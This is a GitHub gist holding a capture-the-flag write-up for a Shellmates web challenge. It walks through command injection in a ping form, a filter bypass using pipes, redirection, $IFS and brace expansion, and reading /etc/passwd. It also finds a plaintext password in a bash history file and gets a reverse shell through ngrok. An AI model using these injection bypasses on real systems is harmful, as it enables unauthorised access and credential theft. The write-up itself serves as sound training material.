Skip to content

Instantly share code, notes, and snippets.

@Fa2y

Fa2y/Shellmates_Writeup.md

Created April 13, 2020 13:36
Show Gist options
  • Save Fa2y/b0a0ea53d8cf53d8fba224cc5c6924be to your computer and use it in GitHub Desktop.
Save Fa2y/b0a0ea53d8cf53d8fba224cc5c6924be to your computer and use it in GitHub Desktop.
Download ZIP
A writeup to web ctf challenge by shellmates, command injection, a privesc.
Raw
Shellmates_Writeup.md

Writeup Web Shellmates

First glance at the application, it was using the command "ping -c 1 $arg" you can see that from the output of the command "Ping Service" web title, so my first try was command injection using ";id" as semicolen is a command separter, i got "okay boomer" XD, so there was some kind of filter,than I tried the pipe "|" as it acts as a command separter and pipe the stdout of the previous command to the stdin of the next one, we just need it as a command separator, tried "cat /etc/passwd" to see what users are available but got "okay boomer" again so we know it's filtering spaces and semicolons,tried "cat</etc/passwd" and it worked:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
.
ctf:x:1000:1000::/home/ctf:/bin/bash

Awesome!, took a look at the content of the index.php to see how the filter really work and I got this:

if (preg_match('/^(.*)[\s;](.*)$/', "$ip")) {echo 'Okay BOOMER';}

the regular expression respond to any exsitence of separetors like spaces or tabs "\t" or return to line... and to semicolons as well. So how can we execute commands without passing any argument, hmmm,we can us the eviroment variable "$IFS" (Internal Field Separator) it actualy contains space,and there's another trick, bash uses {cmd,[args]} for example:{cat,/etc/passwd}, and it worked, you can check more tricks at PayloadAllTheThings/ repo on command injections it's legend... dary. So as in the challenge desctiption, it was mentioned that the flag is at /home/ctf/flag.txt, tried to see the permissions on it:

-r-------- 1 ctf ctf 46 Apr 9 09:51 flag.txt

apprently it's owned by the user ctf and it's not readable by us, Doing a light recon, we can see the ctf user used "sudo -S" and the plain text password "Qu4r4Nt1n3d!@" in the .bash_history file, but we can't pass the password to a sudo or su in the webapp command injection, we need an interactive shell.

Hosted a python reverse shell since the box has python ("which python") and download it to the /tmp on the chanllenge's box.

Did port tunneling with ngrok because it's the simplest, pop a shell and get the flag using "su ctf", and then veiwing the content of /home/ctf/flag.txt:

shellmates{b3_c4r3FuL_w1t|-|_CMD_1nj3ct1i0N!}

Thank to shellmates and the challenge creator(s).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment